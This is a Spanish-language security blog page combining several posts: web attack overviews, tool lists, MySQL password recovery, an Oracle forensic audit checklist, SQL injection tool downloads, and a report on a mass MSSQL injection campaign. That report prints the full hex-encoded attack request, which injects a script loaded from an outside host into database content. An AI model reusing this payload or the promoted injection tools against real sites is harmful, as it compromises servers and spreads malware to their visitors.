Marcos García, miembro de nuestra comunidad ha querido compartir con nosotros la siguiente presentación, que referencia a los ataques más comunes sobre las aplicaciones Web. La idea principal es concientizar a los desarrolladores/administradores, para que tengan en cuenta a qué amenazas y riesgos de seguridad están expuestas sus aplicaciones.

Es importante señalar que existen más ataques, los cuales no figuran en la presentación.

Descargar documentación

También podremos ver ejemplos prácticos de todas las técnicas mencionadas en los siguientes vídeos.

XSS

CSRF

Path Traversal

Null Byte

OS Commanding

Local File Inclusion

Remote File Inclusion

Information Disclosure

SQL Injection/Blind SQL Injection

File Upload

Agradecimientos especiales a Marcos García por compartir esta información con nosotros.

También puede interesarte...

• Revisa la seguridad de tu sitio web Gratis
• Curso sobre desarrollo seguro de aplicaciones web por Google
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• TOP 10 Fallos de Seguridad en Aplicaciones Web
• Multiples Vulnerabilidades en SMF
• Skipfish, escáner de seguridad para aplicaciones web
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• XSS que permite postear a atacante registrado en WordPress

Gracias a kagure he encontrado un repositorio bastante ordenado con herramientas de seguridad, algunos grandes conocidas, otras no tanto, pero todas muy útiles.

Les dejo los enlaces a cada categoría para que descubras nuevas herramientas, aprendas de ellas y las utilices.

• Bluetooth Tools/
• Browser Extensions/
• Exploitation Tools/
• Information Gathering/
• Libraries/
• Network Discovery tools/
• Network Login Auditors/
• Network Security Scanners/
• Networking Utilities/
• OS Detection Tools/
• Packet Crafting Tools/
• Packet Sniffers/
• Password Auditing/
• Password Cracking/
• Port Scanners/
• Reverse Engineering/
• SQL Injection/
• SSL Checkers/
• SSL Proxies/
• Service Fingerprinting/
• Thick Client Tools/
• VoIP Security Tools/
• Web Applicative Proxies/
• Web Applicative Scanners/
• Web Services Security Tools/
• Web Vulnerability Scanners/
• Wi-Fi/

También puede interesarte...

• HackArmoury herramientas de seguridad siempre disponibles
• Kits de crackeo wireless en china
• Nuestros Retos Forenses
• Presentación de conceptos básicos en Seguridad Web
• Resultados e Informes – 3er Reto Forense Comunidad DragonJAR
• Tercer Reto Forense de La Comunidad DragonJAR
• Segundo Reto Forense de La Comunidad DragonJAR
• SSDownloader – Gestor de descargas para Herramientas de Seguridad

Cuando se administra un servidor Web, uno de los puntos claves a tener en cuenta es la seguridad tanto de los servicios como de los aplicativos alojados en el, ya que si no contamos con buenas medidas de seguridad, dichos aplicativos, podría ser la puerta de entrada a nuestra organización de un delincuente informático.

Desafortunadamente, son pocos los administradores que cuentan con conocimientos en seguridad Web y es por esto que día a día se ven casos de instrucciones en donde los sitios Web fueron el débil eslabón por medio del cual ingresaron a los sistemas de una organización.

ZeroDayScan es un servicio que ayuda en la tarea de revisar la seguridad de un aplicativo Web automáticamente, para utilizarlo, solo necesitamos llenar el siguiente formulario, como se indica en la siguiente imagen:

La aplicación permite detectar las siguientes vulnerabilidades

• Cross Site Scripting attacks (XSS)
• Detecta directorios ocultos o backups
• Busca inyecciones SQL
• Detecta automáticamente vulnerabilidades Zero Day
• Realiza un fingerprint de nuestra aplicativo Web

Si ZeroDayScan detecta algo en nuestro sitio Web, nos enviará vía correo electrónico, un completo informe con las vulnerabilidades encontradas, así como los pasos a seguir para corregirlas….. y todo esto TOTALMENTE GRATIS.

Si tienes un sitio Web, es muy recomendable que utilices esta herramienta, para conocer el estado actual de la seguridad en tu pagina, posiblemente se demoren en enviarte el informe, pero es normal ya están procesando muchas solicitudes.

Mas Información
Pagina Oficial del ZeroDayScan

También puede interesarte...

• Presentación de conceptos básicos en Seguridad Web
• Curso sobre desarrollo seguro de aplicaciones web por Google
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• TOP 10 Fallos de Seguridad en Aplicaciones Web
• Multiples Vulnerabilidades en SMF
• XSS que permite postear a atacante registrado en WordPress
• Video Tutorial Fingerprint y Escaneo Básico
• Todos los Vídeos de AntiChat – Parte I

1. Detenemos el servicio si se esta ejecutando:

/etc/init.d/mysql  stop

2. El siguiente paso es reiniciar el servidor MYSQL en modo seguro, con los siguientes parámetros:

mysqld_safe --skip-grant-tables --skip-networking

3. Ahora, en otra consola entramos como root al servidor, de esta forma:

mysql -u root -p mysql

4. Si todo ha salido bien, debemos tener  el prompt de Mysql, en el cual  procederemos a cambiar el password, en la tabla user de la base  de datos mysql:

UPDATE user SET Password=PASSWORD('passwordnuevo') WHERE User='root';
flush privileges;

5. Por ultimo solo basta  terminar el proceso de mysql-safe y reiniciar el servidor como se hace normalmente:

pkill mysql -safe
/etc/init.d/mysql start

Cabe resaltar que  la mejor forma de evitarse este tipo de calamidades, es bueno recordar las contraseñas, en la red existen muchas aplicaciones las cuales nos ayudan a gestionar y administrar todas nuestras contraseñas, recuerda que en la comunidad hemos proporcionado siempre información útil para maneja tus contraseñas fácilmente, herramientas para generar contraseñas seguras, e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten utilizar tu rostro como contraseña para que nunca pierdas una clave y no te toque recurrir a procedimientos como este.

También puede interesarte...

• Las peores Contraseñas en Español
• Las Peores 500 Contraseñas de Todos los Tiempos
• Cambia tu clave maestra en LastPass
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Resetear Password de Root
• CeWL – Generador de Diccionarios Personalizados
• Cómo configurar LDAP en Ubuntu Server o Debian
• “1234″ y “password” son las Contraseñas + Utilizadas en USA

1). Determinar si en la BD esta activo el modo de operación en ARCHIVELOG o NONARCHIVELOG. Si este no esta activo, la evidencia de ataque o cambios serán sobrescritos por un nuevo redo.

Se puede determinar realizando una sentencia SQL a la BD:

• SELECT VALUE V$PARAMETER WHERE FROM NAME=’archiv_log_start’;

2). Análisis de los Oracle Data Blocks, para determinar:

• Registros eliminados
• Localizar bloques asignados a tablas (OBJETOS DE INTERÉS)
• Seguimiento de Objetos creados y eliminados
• Localización de tablas eliminadas
• Localización de Funciones eliminadas

3). Obtención del SID de la BD

4). Enumeración de usuarios

• SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;
• SELECT USERID, COMMENT$TEXT FROM SYS.AUD$;

5). Consultar Ataques de Fuerza bruta o Diccionario a cuentas de usuario

• SQL> SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;
• SELECT NAME, LCOUNT FROM USER$ WHERE LCOUNT>0;
• SELECT NAME, LTIME FROM USER$ WHERE ASTATUS = 4;

6). Consulta de Ataques de Fuerza Bruta a la cuenta SYS

7). Consulta de intentos del exploit AUTH_ALTER_SESSION

• SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;

8). Consulta de intentos de iniciar una sesiÛn la base de datos a travÈs de XML (XDB)

• SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;
• SELECT COMMENT$TEXT FROM SYS.AUD$ WHERE USERID = ‘DBSNMP’;
• SELECT TERMINAL,SPARE1,TIMESTAMP# FROM SYS.AUD$ WHERE USERID=’DBSNMP’;

9). Consulta si la Auditoria esta habilitada

• SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY ORDER BY SAMPLE_TIME;
• SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;
• SELECT USERID,ACTION#,TIMESTAMP#,LOGOFF$TIME FROM AUD$;

10). Consulta del archivo sqlnet.log,Agntsrvc.log, spfilesid.ora, o el init.ora todas las ubicaciones referentes a estos parámetros:

• audit_file_dest        ——-> Sistema de Auditoria (ORACLE_HOME/rdbms/audit)
• background_dump_dest    ——-> archivo alert.log y tracer de procesos ($ORACLE_HOME/admin/$ORACLE_SID/bdump)
• core_dump_dest        ——-> archivos Oracle core dump ($ORACLE_HOME/DBS/)
• db_recovery_file_dest    ——-> redo logs, flashback logs, y RMAN backups
• user_dump_dest        ——-> Archivos trace debuggin procesos/usuarios (/oracle/utrc)
• utl_file_dir        ——-> Especifica uno o m·s directorios que Oracle debe utilizar para PL/SQL archivos E/S.
• control_files        ——-> Especifica uno o varios nombres de archivos de control de Oracle
• db_create_file_dest    ——-> Especifica la ubicación predeterminada de archivos de datos administrados por Oracle.
• db_create_online_log_dest_n—-> Especifica la ubicación de los redo logs y file control
• log_archive_dest    ——-> Es aplicable solo si la BD esta en modo de ARCHIVELOG
• log_archive_dest_n    ——-> Define hasta 10 archivos de registros logs.

11). Consulta de archivos Log Listener (ORACLE_HOME/network/admin/listener.ora) (lsnrctl status me dara la ubicación actual)

12). Revisión de los LOGS de sentencias(SQL $ORACLE_HOME/bin/LOGIN.SQL,$ORACLE_HOME/dbs/LOGIN.SQL,$ORACLE_HOME/SQLPlus/admin/glogin.sql)

13). Consultando informacion de los inicios de Sesion:

• SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY

14). Consultar una lista de usuarios y roles, usuarios con función de DBA, para buscar inconsistencias,o usuarios creados por un atacante y la generación de contraseñas fuertes con la validación de los hash, cuentas bloqueadas, tiempos de password

• SELECT USER#, NAME, ASTATUS, PASSWORD, CTIME, PTIME, LTIME FROM SYS.USER$ WHERE TYPE#=1;
• SELECT U.NAME AS “GRANTEE”, U2.NAME AS “ROLE” FROM SYS.USER$ U,SYS.USER$ U2, SYS.SYSAUTH$ A WHERE U.USER# = A.GRANTEE# AND PRIVILEGE# = U2.USER#;

15). Consultar una lista de objetos y privilegios en el sistema

• SELECT U.NAME AS “GRANTEE”, P.NAME AS “PRIVILEGE”, U2.NAME AS “OWNER”, O.NAME AS “OBJECT” FROM SYS.USER$ U, SYS.USER$ U2,SYS.TABLE_PRIVILEGE_MAP P, SYS.OBJ$ O, SYS.OBJAUTH$ A WHERE U.USER# =A.GRANTEE# AND A.OBJ# = O.OBJ# AND P.PRIVILEGE = A.PRIVILEGE# AND O.OWNER#=U2.USER#;
• SQL> SELECT OBJ#, OWNER#, NAME, TYPE#, CTIME, MTIME, STIME FROM SYS.OBJ$ ORDER BY CTIME ASC;

16). Consulta de tablas eliminadas

• SELECT U.NAME, R.ORIGINAL_NAME, R.OBJ#, R.DROPTIME, R.DROPSCN FROM SYS.RECYCLEBIN$ R, SYS.USER$ U WHERE R.OWNER#=U.USER#;

17). Consulta de Directorios, archivos datos, archivos externos, tablas externas, buscando elementos perdidos o ubicados en sitios diferentes por el atacante.

• SELECT T.NAME AS “TABLESPACE”, D.NAME AS “FILNAME” FROM V$DATAFILE D, TS$ T WHERE T.TS#=D.TS#;
  SELECT U.NAME AS “OWNER”, O.NAME AS “DIRECTORY”, D.OS_PATH AS “PATH” FROM SYS.OBJ$ O, SYS.USER$ U, SYS.DIR$ D WHERE U.USER#=O.OWNER# AND O.OBJ#=D.OBJ#;
• SELECT O.NAME, D.DEFAULT_DIR FROM SYS.OBJ$ O, SYS.EXTERNAL_TAB$ D WHERE D.OBJ# = O.OBJ#;

18). El Monitor del Sistema (SMON) MON_MOD$ Table

• SELECT U.NAME AS “OWNER”, O.NAME AS “OBJECT”, M.OBJ#, M.INSERTS,M.UPDATES, M.DELETES, M.TIMESTAMP FROM SYS.MON_MODS$ M, SYS.USER$ U,SYS.OBJ$ O WHERE O.OBJ#=M.OBJ# AND U.USER#=O.OWNER#;

19). Revision de Triggers al encendido, apagado, inicio y terminacion de sesion

• SELECT U.NAME AS “OWNER”, O.NAME AS “ENABLED_TRIGGER_NAME”,DECODE(T.TYPE#, 0, ‘BEFORE’,2, ‘AFTER’,'NOTSET’) AS “WHEN” FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1;
• SELECT U.NAME AS “OWNER”, O.NAME AS “ENABLED_TRIGGER_NAME” FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,1) = 1;
• SELECT U.NAME AS “OWNER”, O.NAME AS “ENABLED_TRIGGER_NAME” FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,2) = 2;
• SELECT U.NAME AS “OWNER”, O.NAME AS “ENABLED_TRIGGER_NAME” FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,8) = 8;
• SELECT U.NAME AS “OWNER”, O.NAME AS “ENABLED_TRIGGER_NAME” FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,16) = 16;

20). Consulta de librerias, que puedan estar ejecutando codigo arbitrario(malicioso)

• SELECT U.NAME AS “OWNER”, O.NAME AS “LIBRARY”, L.FILESPEC AS “PATH” FROM SYS.LIBRARY$ L, SYS.USER$ U, SYS.OBJ$ O WHERE O.OBJ#=L.OBJ# AND O.OWNER#=U.USER#;

21). Consultas de FlashBack (nuevos privilegios, derechos asignados, nuevos objetos, objetos eliminados) entre la tabla actual y la anterior en un tiempo determinado.

• SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ MINUS SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ AS OF TIMESTAMP(SYSDATE – INTERVAL ’3600′ MINUTE);
• SELECT NAME FROM SYS.OBJ$ MINUS SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE – INTERVAL ’156′ MINUTE);
• SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE – INTERVAL ’156′ MINUTE) MINUS SELECT NAME FROM SYS.OBJ$;

22). Consulta de las tablas RECYLEBIN$ y OBJ$

• SQL> SELECT MTIME, NAME, OWNER#, OBJ# FROM SYS.OBJ$ WHERE NAME LIKE ‘BIN$%’;

23). Consultas la Administracion automatica Deshacer ( UNDOTBS01.DBF)

• SELECT SEGMENT_NAME,HEADER_FILE,HEADER_BLOCK,EXTENTS,BLOCKS FROM DBA_SEGMENTS WHERE SEGMENT_NAME LIKE ‘_SYSSMU%$’;

24). Consulta de los logs del Apache (Oracle Application Server)

25). ¿faltó algo? háznoslo saber en los comentarios.

Actualizado:
El usuario coco, nos comparte una serie de scripts que utiliza en su trabajo para auditar su base de datos oracle, puedes basarte en ellos para auditar tu propia DB de oracle.

También puede interesarte...

• Seguridad Informática, un reto para la Ingeniería del Software o una necesidad
• Nueva Clase de Vulnerabilidad en Bases de Datos SQL
• Curso Gratis de Seguridad y Redes en el Sena Virtual
• WifiWay 2.0.3 FINAL
• Laboratorio Práctico de Auditoria y Pentest
• Presentación de conceptos básicos en Seguridad Web
• DLL Hijacking con Metasploit
• Repositorio con Herramientas de Seguridad

El código fuente esta escrito en Visual Basic .NET 2005, pueden modificar el codigo y aumentar sus funcionalidades.

Descargar Codigo Fuente de Herramienta para SQL Injection.

Password: www.dragonjar.org

Mas Información:
SqlInyection Tools JDA version 2009
Código fuente de SqlInyection Tools JDA version 2009

También puede interesarte...

• Creando un Joiner en Visual Basic
• Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET
• Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET
• NMap 5.50
• BackTrack 5 R1
• Descargate la Wikipedia en español
• Descarga Firefox 5 Estable
• Sacale el jugo a tu conexión de Telmex, Claro, Embratel o NET

MultiInjector es una herramienta para realizar automáticamente sql injection en un sitio especificado, al ingresarle una url o una serie de estas, automáticamente comprobara si es/son vulerable/s.

Algunas Características de esta Herramienta son:

• Recibe una lista de URL como entrada
• Reconoce los parámetros URL de la lista
• Ejecución de comandos sobre el sistema operativo a distancia que permite xp_cmdshell en el servidor SQL, posteriormente, ejecutar cualquier comando introducido por el usuario sobre el sistema operativo
• Conexiones paralelas configurables para aumentar la velocidad del ataque
• Uso opcional de un proxy HTTP para ocultar el origen de los ataques
• Entre otras…

Los Requisitos para ejecutarla…

• Python >= 2.4
• Pycurl (compatible con la versión de Python)
• Psyco (compatible con la versión de Python)

Puede descargar aquí MultiInjector de este enlace

Para Mas Información click aquí.

También puede interesarte...

• Repositorio con Herramientas de Seguridad
• WebRaider – Explotación automatizada de aplicaciones Web
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)
• Como detectar y prevenir escalada de privilegios en GNU/Linux
• Memorias y Videos del Asegúr@IT III
• Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas
• Curso Completo de Metasploit Framework
• NMap 5.50

El SENA (Servicio Nacional de Aprendizaje), en su página www.senavirtual.edu.co o en su plataforma sena sofia plus está implementando nuevos cursos programacion virtuales, entre las temáticas de estos cursos de programacion encontramos lenguajes como JAVA, C++, modelado de datos y calidad de software.

Recordemos que al terminar los cursos de programacion en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país.

El listado de cursos de programacion que puedes realizar en el senavirtual es el siguiente:

Cursos de Programacion - Programación Orientada A Objetos
Variables y estructuras de Control en la Programación orientada a objetos: Java
Desarrollo de aplicaciones con Interfaz Gráfica, Manejo de Eventos, Clases y Objetos : Java
Desarrollo de Aplicaciones con Manejo de Datos en la Memoria- Java
Desarrollo de Aplicaciones con Manejo de Archivos de Texto y el Manejo de Excepciones en JAVA
Desarrollo de Aplicaciones con Manejo de Proceso Simultaneo y Uso de Menús: Java
Desarrollo de Applets/Aplicaciones con Uso de Base de Datos, Redes, Servlets y Multimedia
Estructura del Lenguaje de Programación c++ ( Nivel I del cursos de programacion)
Módulos, estructura de almacenamiento y POO utilizando el lenguaje de programación C++ ( Nivel II)
Uso de clases, objetos, métodos y archivos secuenciales en POO con lenguaje de programación C++ ( Nivel III)



cursos de programacion - Modelado De Datos
Informática: Administración de bases de datos utilizando Microsoft® Access 2000
Informática: Diseño de bases de datos en SQL
Metodología de la Programación de Sistemas Informáticos
Estructuras de datos Lineales
Estructuras de datos No Lineales
Modelación de Sistemas – Modelación
Modelación de Sistemas – Simulación
Base de datos: Conceptuación y sistemas de Administración
Diseño de Casos de Uso
Metodologías de Análisis y Diseño de Sistemas-de la incepción al diseño de la arquitectura
Metodologías de Análisis y Diseño de Sistemas-del diseño a la implementación
Principios del análisis y diseño orientado a objetos, utilizando el estándar UML
Aplicación metodología orientada a objetos utilizando el estándar UML

Para acceder a estos cursos de programacion gratuitos del SENA solo tienes que entrar al enlace de los cursos de programacion en el sena virtual.

También puede interesarte...

• www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena
• Curso Gratis de Seguridad y Redes en el Sena Virtual
• Cupos disponibles en el SENA
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Sena Virtual Cursos Gratis de Informática
• Curso Gratuito de Ingles con el Sena Virtual
• Cursos Gratis de Diseño Web en el Sena Virtual
• SENA Sofia Plus

Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.

Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server.

La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas
por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.

Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.

Los requests que saldrían en los logs del web server se asemejan al siguiente:

GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).

También puede interesarte...

• Repositorio con Herramientas de Seguridad
• MultiInjector – Herramienta Automática de Inyección SQL
• Presentación de conceptos básicos en Seguridad Web
• Revisa la seguridad de tu sitio web Gratis
• Como Recuperar Clave MySQL
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• Memorias ExpoDefensa 2009
• Código Fuente Herramienta para SQL Injection

Lo que hace la herramienta es evaluar los comandos SQL recibidos, basandose en una lista que podemos definir como sentencias peligrosas para la integridad de nuestra aplicación Web y base de datos, como por ejemplo: DROP, CREATE, ALTER, INSERT, etc.

Además de sus prestaciones la herramienta es distribuida bajo licencia GPL.

GreenSQL cumple su función de Firewall bloqueando inyecciones de comandos utilizados para tareas administrativas de bases de datos. Además calcula el riesgo de cada consulta SQL bloqueando las consultas que comprometan la seguridad del aplicativo Web o base de datos.

La página Web oficial del proyecto ha habilitado una sección demostrativa de la herramienta, en la cual podemos observar la efectividad del cortafuegos. Para acceder al demo solo debemos ingresar a la siguiente URL.

Más información de GreenSQL
Descargar GreenSQL
Documentación de GreenSQL
Demo de GreenSQL

También puede interesarte...

• Presentación de conceptos básicos en Seguridad Web
• Repositorio con Herramientas de Seguridad
• SSDownloader – Gestor de descargas para Herramientas de Seguridad
• ENDIAN una solución gratuita de seguridad perimetral
• Revisa la seguridad de tu sitio web Gratis
• Hakin9 Español GRATIS
• Como Recuperar Clave MySQL
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?